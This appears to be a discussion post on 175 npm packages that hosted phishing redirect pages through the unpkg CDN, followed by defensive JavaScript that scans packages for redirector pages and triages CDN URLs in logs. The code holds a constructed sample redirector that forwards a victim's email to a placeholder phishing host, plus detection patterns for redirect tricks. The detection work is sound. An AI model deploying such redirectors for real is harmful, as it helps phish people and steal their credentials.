Recently, researchers discovered 175 malicious npm packages (with ~26,000 downloads) being used in a credential phishing campaign — not to infect developers, but to host phishing redirects using the npm registry + unpkg CDN.
Instead of running malicious code on install, these packages stored HTML/JS redirector pages that sent victims on to phishing sites, with the victim's email address already pre-filled so the page looked more legitimate.
This shows how attackers are now abusing trusted developer platforms (like npm and CDNs) to host phishing infrastructure — blurring the line between supply chain attacks and social engineering.
🔍 Key Highlights:
- 175 npm packages acting as redirect hosts
- Infrastructure abuse via npm + unpkg CDN
- Targets include tech, industrial, and energy companies
- Phishing pages look more convincing (pre-filled emails)
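The mechanism above (static HTML/JS inside a package, delivered to victims over the CDN, with the email carried in the URL) suggests two defender-side checks: scan a package's published files for redirector pages, and triage web-proxy or browser-telemetry URLs for CDN-served HTML that carries an email address. The following is an added example, not code from the researchers or from any of the packages involved. The sample package and the log URLs are constructed for this example, the indicator regexes are assumptions about what a redirector page typically contains, and the unpkg URL layout relied on is the CDN's documented `https://unpkg.com/<package>@<version>/<file>` form.

```javascript
// Added example (not from the post or the research): heuristic scan of an npm
// package's files for HTML/JS redirector pages, plus URL triage for CDN hits.
// Everything below is constructed for illustration.

// Indicator patterns: assumptions about what a redirector page tends to contain.
const INDICATORS = [
  { name: 'meta-refresh',   re: /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*url\s*=/i },
  { name: 'location-write', re: /\blocation(\.href|\.replace\s*\(|\.assign\s*\(|\s*=[^=])/i },
  { name: 'reads-fragment', re: /\blocation\.(hash|search)\b/i },
  { name: 'email-field',    re: /\bemail\b/i },
  { name: 'base64-decode',  re: /\batob\s*\(/ },
];
const URL_RE = /https?:\/\/[^\s"'<>)]+/g;
const EMAIL_RE = /[\w.+-]+@[\w-]+\.[\w.-]+/;

// Constructed sample package: one harmless module plus a redirector page.
// The target host uses the reserved .invalid TLD; it is a placeholder.
const SAMPLE_PACKAGE = {
  'package.json': '{ "name": "example-redirector-pkg", "version": "1.0.0", "main": "index.js" }',
  'index.js': 'module.exports = function add(a, b) { return a + b; };',
  'README.md': '# example\nA harmless-looking package.',
  'docs/index.html': '<html><body><a href="./api.html">API</a></body></html>',
  'login.html': [
    '<!doctype html><html><head><script>',
    '  var email = decodeURIComponent(location.hash.slice(1));',
    '  window.location.href = "https://phish.example.invalid/login?email=" + email;',
    '</script></head><body>Redirecting...</body></html>',
  ].join('\n'),
};

// Scan one file. Only web-servable text files matter; a file is called a
// redirector when it performs a redirect AND either takes input from the URL
// (fragment/query, email, base64) or names an absolute external URL.
function scanFile(name, content) {
  if (!/\.(html?|js|mjs)$/i.test(name)) return null;
  const indicators = INDICATORS.filter((i) => i.re.test(content)).map((i) => i.name);
  const targets = Array.from(content.matchAll(URL_RE), (m) => m[0]);
  const redirects = indicators.includes('meta-refresh') || indicators.includes('location-write');
  const usesInput = indicators.some((n) => ['reads-fragment', 'email-field', 'base64-decode'].includes(n));
  return { file: name, indicators, targets, redirector: redirects && (usesInput || targets.length > 0) };
}

// Scan a whole package given as { path: contents }.
function scanPackage(files) {
  const results = Object.entries(files).map(([name, body]) => scanFile(name, body)).filter(Boolean);
  return {
    flagged: results.filter((r) => r.redirector),
    clean: results.filter((r) => !r.redirector).map((r) => r.file),
  };
}

// URL triage for proxy or browser-telemetry logs:
//   'strong' - HTML served from unpkg with an email address in the query/fragment
//   'weak'   - HTML served from unpkg with no email visible (unpkg also hosts
//              legitimate docs, so this is a triage lead, not a verdict)
//   'none'   - anything else
// Note: browsers do not send the URL fragment to the server, so network proxies
// only ever see the 'weak' form; the 'strong' form needs client-side telemetry.
function triageUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return 'none'; }
  const onUnpkg = url.hostname === 'unpkg.com' || url.hostname.endsWith('.unpkg.com');
  const servesHtml = /\.html?$/i.test(url.pathname);
  if (!(onUnpkg && servesHtml)) return 'none';
  let tail = url.search + url.hash;
  try { tail = decodeURIComponent(tail); } catch { /* keep the raw string */ }
  return EMAIL_RE.test(tail) ? 'strong' : 'weak';
}

// Constructed sample log entries (the package name and victim address are made up).
const SAMPLE_LOG_URLS = [
  'https://unpkg.com/example-redirector-pkg@1.0.0/login.html#victim%40corp.example',
  'https://unpkg.com/example-redirector-pkg@1.0.0/login.html',
  'https://unpkg.com/react@18.2.0/umd/react.production.min.js',
  'not a url',
];

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE).flagged, null, 2));
for (const u of SAMPLE_LOG_URLS) console.log(triageUrl(u), u);
```

In practice the package scan would run over the extracted tarball of each new version a mirror or CI pipeline pulls in, and the URL triage over egress logs; both are heuristics meant to surface candidates for a human to confirm, and the fragment caveat in the comments is the main reason proxy-only visibility undercounts this delivery pattern.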
💭 What do you think?
Drop your thoughts below — especially if you’ve seen npm/CDN abuse or have ideas for detection strategies.
Let’s make this an actionable learning thread!